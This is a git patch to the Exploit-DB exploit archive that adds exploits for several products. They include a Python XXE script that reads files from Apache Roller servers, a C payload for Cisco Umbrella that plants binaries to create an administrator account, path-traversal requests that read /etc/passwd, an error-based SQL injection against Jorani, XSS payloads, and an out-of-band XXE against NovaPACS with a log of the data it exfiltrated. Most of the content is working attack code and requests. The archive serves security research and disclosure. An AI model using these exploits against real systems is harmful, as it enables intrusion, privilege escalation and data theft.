From 8379495e8e0d894180b8e4ef4f69f21c436379b0 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 7 Sep 2018 05:01:55 +0000 Subject: [PATCH] DB: 2018-09-07 10 changes to exploits/shellcodes Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure) Tenda ADSL Router D152 - Cross-Site Scripting Jorani Leave Management 0.6.5 - Cross-Site Scripting Jorani Leave Management 0.6.5 - 'startdate' SQL Injection Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) WirelessHART Fieldgate SWG70 3.0 - Directory Traversal Online Quiz Maker 1.0 - 'catid' SQL Injection Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal Online Quiz Maker 1.0 - 'catid' SQL Injection D-Link Dir-600M N150 - Cross-Site Scripting Logicspice FAQ Script 2.9.7 - Remote Code Execution PHP File Browser Script 1 - Directory Traversal --- exploits/hardware/webapps/45342.txt | 41 +++++++++ exploits/hardware/webapps/45343.txt | 17 ++++ exploits/linux/webapps/45341.py | 118 +++++++++++++++++++++++++ exploits/php/webapps/45323.txt | 6 +- exploits/php/webapps/45326.txt | 4 +- exploits/php/webapps/45338.txt | 27 ++++++ exploits/php/webapps/45340.txt | 70 +++++++++++++++ exploits/windows_x86-64/local/45339.c | 53 +++++++++++ exploits/windows_x86/webapps/45296.txt | 5 +- exploits/xml/webapps/45337.txt | 38 ++++++++ files_exploits.csv | 17 ++-- 11 files changed, 385 insertions(+), 11 deletions(-) create mode 100644 exploits/hardware/webapps/45342.txt create mode 100644 exploits/hardware/webapps/45343.txt create mode 100755 exploits/linux/webapps/45341.py create mode 100644 exploits/php/webapps/45338.txt create mode 100644 exploits/php/webapps/45340.txt create mode 100644 exploits/windows_x86-64/local/45339.c create mode 100644 exploits/xml/webapps/45337.txt diff --git a/exploits/hardware/webapps/45342.txt b/exploits/hardware/webapps/45342.txt new file mode 100644 index 000000000..cef091dd8 --- /dev/null +++ b/exploits/hardware/webapps/45342.txt @@ -0,0 +1,41 @@ +# Exploit Title: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal +# Date: 2018-08-29 +# Exploit Author: Hamit CİBO +# Vendor Homepage: http://endress.com +# Software Link: https://www.endress.com/en/Field-instruments-overview/System-Components-Recorder-Data-Manager/wirelesshart-gateway-fieldgate-swg70 +# Version: SWG70 3.X +# Tested on: Windows +# CVE : + +# PoC +# Request + +POST /fcgi-bin/wgsetcgi HTTP/1.1 +Content-Length: 129 +Content-Type: application/x-www-form-urlencoded +Referer: {Target} +Cookie: ******** +Host: {Target} +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.21(KHTML,like Gecko)Chrome/41.0.2228.0 Safari/537.21 +Accept: */* + +action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand + +# Response + +HTTP/1.1 200 OK +Date: Fri, 13 Mar 1970 17:13:58 GMT +Server: Apache +Cache-Control: no-cache +Keep-Alive : timeout=15,max=100 +Connection : Keep-Alive +Content-Type : text/plain +Content-Length : 333 + +root:x:0:0:root:/root:/bin/sh +ftp:x:11:101:ftp user:/home:/bin/false +www:x:12:102:www user:/home:/bin/false +sshd:x:13:100:SSH Server:/var/run/sshd:/bin/false +service:x:500:100:Service User:/home:/bin/sh \ No newline at end of file diff --git a/exploits/hardware/webapps/45343.txt b/exploits/hardware/webapps/45343.txt new file mode 100644 index 000000000..d40185043 --- /dev/null +++ b/exploits/hardware/webapps/45343.txt @@ -0,0 +1,17 @@ +# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting +# Date: 2018-09-06 +# Exploit Author: PUNIT DARJI +# Vendor Homepage: www.dlink.co.in +# Hardware Link: https://amzn.to/2NUIniO +# Version: DIR-600M Firmware 3.01 +# Tested on: Windows 7 ultimate +# CVE: N/A + +#POC + +Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router] +Go to --> "Advance" --> "Dynamic DNS" --> "Hostname" + +"Username" --> +and hit apply Refresh the page, and you will get the 2 pop-up first +"PSYCHO55" and second "PunitDarji". \ No newline at end of file diff --git a/exploits/linux/webapps/45341.py b/exploits/linux/webapps/45341.py new file mode 100755 index 000000000..fac31b78a --- /dev/null +++ b/exploits/linux/webapps/45341.py @@ -0,0 +1,118 @@ +# Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) +# Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" +# Date: 2018-09-05 +# Exploit Author: Marko Jokic +# Contact: http://twitter.com/_MarkoJokic +# Vendor Homepage: http://roller.apache.org/ +# Software Link: http://archive.apache.org/dist/roller/ +# Version: < 5.0.3 +# Tested on: Linux Ubuntu 14.04.1 +# CVE : CVE-2014-0030 + +# This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. +# There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. +# 'SIMPLE' payload will work in most cases and will be used by default, if +# server errors out, use 'ADVANCED' payload. +# 'ADVANCED' payload will start local web server and serve malicious XML which +# will be parsed by a target server. +# To successfully perform attack with 'ADVANCED' payload, make sure that port +# you listen on (--lport flag) is accessible out of the network. + +#!/usr/bin/env python + +import SimpleHTTPServer +import SocketServer +import argparse +import sys +import threading +from xml.etree import ElementTree +import urllib3 + +import requests + +SIMPLE_PAYLOAD = """ + +]> + + &xxe; + +""" + +ADVANCED_PAYLOAD = """ + + +"> + +%dtd; +]> + + &all; + +""" + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): + def do_GET(self): + self.send_response(200) + self.send_header('Content-Type', 'text/html') + self.end_headers() + self.wfile.write('') + +def check_exploit(host): + response = requests.post(host + "/roller-services/xmlrpc", verify=False) + if response.status_code == 200: + return True + return False + +def exploit(host, payload): + response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) + xml_tree = ElementTree.fromstring(response.text) + parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text + print parsed_response + +def start_web_server(port): + handler = MyHandler + httpd = SocketServer.TCPServer(('', port), handler, False) + httpd.allow_reuse_address = True + httpd.server_bind() + httpd.server_activate() + httpd.handle_request() + httpd.shutdown() + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") + parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") + parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") + parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") + args = parser.parse_args() + + host = args.url + full_file_path = args.file + + advanced = False + lhost = args.lhost + lport = args.lport + + if lport is not None and lport is not None: + advanced = True + + check = check_exploit(host) + + if check: + if advanced: + th = threading.Thread(target=start_web_server, args=(lport,)) + th.daemon = True + th.start() + + payload = ADVANCED_PAYLOAD.format(full_file_path, "http://{}:{}".format(lhost, lport)) + else: + payload = SIMPLE_PAYLOAD.format(full_file_path) + + exploit(host, payload) + else: + print "[-] TARGET IS NOT VULNERABLE!" + +main() \ No newline at end of file diff --git a/exploits/php/webapps/45323.txt b/exploits/php/webapps/45323.txt index c2093d56a..73f2526eb 100644 --- a/exploits/php/webapps/45323.txt +++ b/exploits/php/webapps/45323.txt @@ -18,7 +18,7 @@ # Request(POST): POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1 -Host: www.hscripts.com +Host: server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 @@ -54,14 +54,14 @@ uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71706 # Request(POST): POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1 -Host: www.hscripts.com +Host: server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: -https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php +https://server/admin/add-category.php Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4 Connection: keep-alive Upgrade-Insecure-Requests: 1 diff --git a/exploits/php/webapps/45326.txt b/exploits/php/webapps/45326.txt index 3f24f9334..b9f8091ec 100644 --- a/exploits/php/webapps/45326.txt +++ b/exploits/php/webapps/45326.txt @@ -30,14 +30,14 @@ POST /admin/faqs/faqimages?CKEditor=faqs-answer&CKEditorFuncNum=1&langCode=en HTTP/1.1 -Host: faq-script.logicspice.com +Host: server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: -http://faq-script.logicspice.com/admin/faqs/edit/eine-frage-fuer-onkel-peter +http://server/admin/faqs/edit/eine-frage-fuer-onkel-peter Cookie: __asc=3c88bfff1659e6148e6168c52d2; __auc=3c88bfff1659e6148e6168c52d2; _ga=GA1.2.696297698.1535960501; _gid=GA1.2.2097449566.1535960501; __zlcmid=oDhc8xpdUQvf8W; diff --git a/exploits/php/webapps/45338.txt b/exploits/php/webapps/45338.txt new file mode 100644 index 000000000..c1d3ce83d --- /dev/null +++ b/exploits/php/webapps/45338.txt @@ -0,0 +1,27 @@ +# Exploit Title: Jorani Leave Management System 0.6.5 – Cross-Site Scripting +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-09-06 +# Google Dork: N/A +# Vendor: Benjamin BALET +# Software Link: https://jorani.org/download.html +# Affected Version: 0.6.5 and possibly before +# Patched Version: unpatched +# Category: Web Application +# Platform: Windows +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-15917 + +# 1. Technical Description: +# Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through +# a GET request in which the values are stored in the user session. + +# 2. Proof Of Concept (PoC): +# Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue= + +# 3. Payload: +# en"> + +# 6. Reference: +# https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/ +# https://github.com/bbalet/jorani/issues/254 \ No newline at end of file diff --git a/exploits/php/webapps/45340.txt b/exploits/php/webapps/45340.txt new file mode 100644 index 000000000..e9ae1b6d9 --- /dev/null +++ b/exploits/php/webapps/45340.txt @@ -0,0 +1,70 @@ +# Exploit Title: Jorani Leave Management 0.6.5 – 'startdate' SQL Injection +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-09-06 +# Google Dork: N/A +# Vendor: Benjamin BALET +# Software Link: https://jorani.org/download.html +# Affected Version: 0.6.5 and possibly before +# Patched Version: unpatched +# Category: Web Application +# Platform: Windows +# Tested on: Win10x64 & Kali Linux +# CVE: 2018-15918 +# Reference: +# https://hackpuntes.com/cve-2018-15918-jorani-leave-management-system-0-6-5-sql-injection/ +# https://github.com/bbalet/jorani/issues/254 + +# 1. Technical Description: +# Jorani Leave Management System 0.6.5 and possibly before are affected by SQL Injection in startdate +# and enddate parameters through POST request in "/leaves/validate" resource. +# This allows a user of the application without permissions to read and modify sensitive information from +# the database used by the application. + +# 2. Proof Of Concept (PoC): +# 2.1 The following POST request generates an error 500 in the Application (add ' in startdate parameter) +--- +POST /leaves/validate HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/leaves/create +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 167 +Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo; +Connection: close + +csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02'&enddate=2018-08-03 +&startdatetype=Morning&enddatetype=Afternoon&leave_id= +--- + +# 2.2 In another request, add two ' to receive a code 200 OK +--- +POST /leaves/validate HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 +Accept: */* +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/leaves/create +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 167 +Cookie: csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd; jorani_session=r8ofjpch4g93t6563t7ols6fBkeeommo; +Connection: close + +csrf_cookie_jorani=521d82ffceaee171d5ff3c5c817c3dfd&id=1&type=compensate&startdate=2018-08-02''&enddate=2018-08-03 +&startdatetype=Morning&enddatetype=Afternoon&leave_id= +--- + +# 3. Payload: +# Parameters: startdate and enddate (POST) +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: +id=1&type=compensate&startdate=2018-08-02&enddate=2018-08-03') AND (SELECT 2138 FROM (SELECT COUNT(*),CONCAT(0x7178787071, +(SELECT (ELT(2138=2138,1))),0x716b716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND +('WfLI'='WfLI&startdatetype=Morning&enddatetype=Afternoon&leave_id= \ No newline at end of file diff --git a/exploits/windows_x86-64/local/45339.c b/exploits/windows_x86-64/local/45339.c new file mode 100644 index 000000000..7a151a0b5 --- /dev/null +++ b/exploits/windows_x86-64/local/45339.c @@ -0,0 +1,53 @@ +/* +# Exploit Title: Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation +# Date: 2018-04-06 +# Exploit Author: paragonsec @ Critical Start +# Vendor Homepage: https://www.opendns.com/ +# Version: Umbrella Roaming Client (2.0.168) +# Tested on: Windows 10 Professional +# CVE : CVE-2018-0437 & CVE-2018-0438 +# Cisco Bug: CSCvj61300 +# Advisory Links: +# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-priv +# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-umbrella-file-read +# https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvj61300 + +OpenDNS Umbrella Roaming Client (2.0.168) Binary Planting Privilege Escalation Exploit + +Details: +Compile the following code and rename it to either netsh.exe or cmd.exe +and place the file in the "C:\ProgramData\OpenDNS\ERC\" directory. Restart the machine! + +Affected Binary paths: +C:\ProgramData\OpenDNS\ERC\cmd.exe +C:\ProgramData\OpenDNS\ERC\netsh.exe + +More Details: +Create malicious MSI file named RoamingClient_WIN_2.0.168.msi and place in +"C:\ProgramData\OpenDNS\ERC\Upgrades\" and restart the machine. + +Tools Used: +ìAdvanced Installer 14.8" - Used to create the MSI + +Code: +*/ + +#include +#include + +int main() +{ + system("net user pwnage pwnage /add"); + system("net localgroup administrators pwnage /add"); + + FILE * fp; + int i; + /* open the file for writing*/ + fp = fopen ("c:\\opendns_pwnage.txt","w"); + + fprintf (fp, "OpenDNS has been Pwned... New user has been created as an admin!\nBrought to you by paragonsec @criticalstart"); + + /* close the file*/ + fclose (fp); + return 0; +} \ No newline at end of file diff --git a/exploits/windows_x86/webapps/45296.txt b/exploits/windows_x86/webapps/45296.txt index ac6f4add9..9042915dc 100644 --- a/exploits/windows_x86/webapps/45296.txt +++ b/exploits/windows_x86/webapps/45296.txt @@ -23,4 +23,7 @@ CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON wave=mmdrv.dll -timer=timer.drv \ No newline at end of file +timer=timer.drv + +# https://vimeo.com/287115273 +# Greetz: ***Greetz: indoushka | Eduardo | GGA*** \ No newline at end of file diff --git a/exploits/xml/webapps/45337.txt b/exploits/xml/webapps/45337.txt new file mode 100644 index 000000000..cad6c4e2c --- /dev/null +++ b/exploits/xml/webapps/45337.txt @@ -0,0 +1,38 @@ +# Title: NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure) +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-09-07 +# Vendor: NovaRad Corporation +# Product web page: https://www.novarad.net +# Affected version: 8.5.19.75 (Diagnostics Viewer, Study Browser) +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Advisory ID: ZSL-2018-5488 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5488.php +# CVE: N/A + +# Desc: NovaPACS suffers from an unauthenticated XML External Entity +# (XXE) injection vulnerability using the DTD parameter entities technique +# resulting in disclosure and retrieval of arbitrary data from the affected +# node via out-of-band (OOB) channel attack. The vulnerability is triggered +# when importing XML format preferences within the settings submenu. + +# PoC +# Malicious.xml: + + + +%remote; +%root; +%oob;]> + +# Attacker's xxe.xml: + + + "> + +Data retrieval: + +lqwrm@metalgear:~$ python -m SimpleHTTPServer 8080 +Serving HTTP on 0.0.0.0 port 8080 ... +10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /xxe.xml HTTP/1.1" 200 - +10.0.1.230 - - [28/Aug/2018 16:27:48] "GET /?;%20for%2016-bit%20app%20support%0D%0A[fonts]%0D%0A[extensions]%0D%0A[mci%20extensions]%0D%0A[files]%0D%0A[Mail]%0D%0AMAPI=1%0D%0A[MCI%20Extensions.BAK]%0D%0A3g2=MPEGVideo%0D%0A3gp=MPEGVideo%0D%0A3gp2=MPEGVideo%0D%0A3gpp=MPEGVideo%0D%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo%0D%0Amod=MPEGVideo%0D%0Amov=MPEGVideo%0D%0Amp4=MPEGVideo%0D%0Amp4v=MPEGVideo%0D%0Amts=MPEGVideo%0D%0Ats=MPEGVideo%0D%0Atts=MPEGVideo%0D%0A[FIX%20DMACS]%0D%0AMinAfterStartup=0 HTTP/1.1" 200 - \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d22fe506..7b6c38ccf 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9903,6 +9903,7 @@ id,file,description,date,author,type,platform,port 45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows, 45089,exploits/linux/local/45089.py,"Inteno’s IOPSYS - (Authenticated) Local Privilege Escalation",2018-07-21,neonsea,local,linux, +45339,exploits/windows_x86-64/local/45339.c,"Cisco Umbrella Roaming Client 2.0.168 - Privilege Escalation",2018-09-06,ParagonSec,local,windows_x86-64, 45101,exploits/windows/local/45101.py,"Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)",2018-07-30,"Shubham Singh",local,windows, 45120,exploits/windows/local/45120.py,"Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)",2018-08-01,"Shubham Singh",local,windows, 45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos, @@ -16746,7 +16747,7 @@ id,file,description,date,author,type,platform,port 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80 45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80 -45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware, +45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,9100 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows, 45170,exploits/windows/remote/45170.py,"Mikrotik WinBox 6.42 - Credential Disclosure (Metasploit)",2018-08-09,"Omid Shojaei",remote,windows, 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001 @@ -37807,6 +37808,7 @@ id,file,description,date,author,type,platform,port 43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php, 43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java, 43777,exploits/php/webapps/43777.py,"GitStack 2.3.10 - Remote Code Execution",2018-01-18,"Kacper Szurek",webapps,php, +45337,exploits/xml/webapps/45337.txt,"NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)",2018-09-06,LiquidWorm,webapps,xml, 43789,exploits/php/webapps/43789.txt,"Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC)",2003-12-15,"GulfTech Security",webapps,php, 43790,exploits/php/webapps/43790.txt,"Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC)",2003-12-16,"GulfTech Security",webapps,php, 43791,exploits/php/webapps/43791.txt,"Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities",2003-12-16,"GulfTech Security",webapps,php, @@ -39665,7 +39667,7 @@ id,file,description,date,author,type,platform,port 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php, 44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp, 44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php, -45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware, +45336,exploits/hardware/webapps/45336.txt,"Tenda ADSL Router D152 - Cross-Site Scripting",2018-09-05,"Sandip Dey",webapps,hardware,80 44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php, 44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux, 44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux, @@ -39836,6 +39838,10 @@ id,file,description,date,author,type,platform,port 45088,exploits/hardware/webapps/45088.txt,"Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)",2018-07-26,vulnc0d3,webapps,hardware,80 45090,exploits/linux/webapps/45090.txt,"Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)",2018-07-26,"Zaran Shaikh",webapps,linux, 45094,exploits/linux/webapps/45094.txt,"Online Trade 1 - Information Disclosure",2018-07-27,Dhamotharan,webapps,linux, +45338,exploits/php/webapps/45338.txt,"Jorani Leave Management 0.6.5 - Cross-Site Scripting",2018-09-06,"Javier Olmedo",webapps,php,80 +45340,exploits/php/webapps/45340.txt,"Jorani Leave Management 0.6.5 - 'startdate' SQL Injection",2018-09-06,"Javier Olmedo",webapps,php,80 +45341,exploits/linux/webapps/45341.py,"Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure)",2018-09-06,"Marko Jokic",webapps,linux, +45342,exploits/hardware/webapps/45342.txt,"WirelessHART Fieldgate SWG70 3.0 - Directory Traversal",2018-09-06,"Hamit CİBO",webapps,hardware, 45097,exploits/php/webapps/45097.txt,"SoftNAS Cloud < 4.0.3 - OS Command Injection",2018-07-27,"Core Security",webapps,php, 45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux, 45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux, @@ -39914,8 +39920,9 @@ id,file,description,date,author,type,platform,port 45314,exploits/php/webapps/45314.txt,"DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)",2018-08-31,Autism_JH,webapps,php, 45319,exploits/windows/webapps/45319.txt,"FsPro Labs Event Log Explorer v4.6.1.2115 - XML External Entity Injection",2018-09-03,hyp3rlinx,webapps,windows, 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80 -45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php, -45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php, -45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php, +45323,exploits/php/webapps/45323.txt,"Online Quiz Maker 1.0 - 'catid' SQL Injection",2018-09-03,AkkuS,webapps,php,80 +45343,exploits/hardware/webapps/45343.txt,"D-Link Dir-600M N150 - Cross-Site Scripting",2018-09-06,"PUNIT DARJI",webapps,hardware, +45326,exploits/php/webapps/45326.txt,"Logicspice FAQ Script 2.9.7 - Remote Code Execution",2018-09-04,AkkuS,webapps,php,80 +45327,exploits/php/webapps/45327.txt,"PHP File Browser Script 1 - Directory Traversal",2018-09-04,AkkuS,webapps,php,443 45328,exploits/php/webapps/45328.txt,"Simple POS 4.0.24 - 'columns[0][search][value]' SQL Injection",2018-09-04,"Renos Nikolaou",webapps,php, 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,